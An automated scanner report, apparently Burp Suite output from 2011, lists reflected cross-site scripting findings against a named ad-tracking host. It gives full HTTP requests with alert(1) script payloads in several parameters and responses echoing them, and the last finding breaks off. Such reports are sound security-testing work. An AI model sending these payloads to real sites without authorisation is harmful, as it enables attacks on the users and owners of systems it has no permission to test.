Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:43 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:43 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:43 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161863; path=/; expires=Thu, 12-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557063^1304558863|1d221
c6c2ad9c6a7
^1304557063^1304558863; path=/; expires=Thu, 05-May-11 01:27:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

5. Cross-site scripting (reflected)  previous  next
There are 254 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9221e<script>alert(1)</script>94174a81006 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4809221e<script>alert(1)</script>94174a81006&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-SM=adver_05-05-2011-00-59-58; expires=Sun, 08-May-2011 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-VT=adver_05-05-2011-00-59-58_7451664491304557198; expires=Tue, 03-May-2016 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-nUID=adver_7451664491304557198; expires=Thu, 05-May-2011 01:14:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4809221e<script>alert(1)</script>94174a81006';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='7451664491304557198';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload d7f22<script>alert(1)</script>7b75f73abf2 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverd7f22<script>alert(1)</script>7b75f73abf2&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_05-05-2011-00-59-56_3893459661304557196; expires=Tue, 03-May-2016 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_3893459661304557196; expires=Thu, 05-May-2011 01:14:56 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverd7f22<script>alert(1)</script>7b75f73abf2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='389345966130455
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7acb7<script>alert(1)</script>73974861fc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/7acb7<script>alert(1)</script>73974861fc3&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:27 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-27_14374677881304557227; expires=Tue, 03-May-2016 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14374677881304557227; expires=Thu, 05-May-2011 01:15:27 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='14374677881304557227';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/7acb7<script>alert(1)</script>73974861fc3';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 93c9a<script>alert(1)</script>cc2d4b62d7a was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=93c9a<script>alert(1)</script>cc2d4b62d7a&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:01 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-01_3147161271304557201; expires=Tue, 03-May-2016 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_3147161271304557201; expires=Thu, 05-May-2011 01:15:01 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='3147161271304557201';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='93c9a<script>alert(1)</script>cc2d4b62d7a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 93096<script>alert(1)</script>716cb79c236 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=7293096<script>alert(1)</script>716cb79c236&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 02-May-2843 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-00_1648367301304557200; expires=Tue, 03-May-2016 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_1648367301304557200; expires=Thu, 05-May-2011 01:15:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='1648367301304557200';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='7293096<script>alert(1)</script>716cb79c236';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ebffd<script>alert(1)</script>c867e4ea0b4 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=ebffd<script>alert(1)</script>c867e4ea0b4&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-02_7091964531304557202; expires=Tue, 03-May-2016 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_7091964531304557202; expires=Thu, 05-May-2011 01:15:02 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='7091964531304557202';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='ebffd<script>alert(1)</script>c867e4ea0b4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 5f4c4<script>alert(1)</script>6979d01a44c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7e328<script>alert(1)</script>7a09c59ed8f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

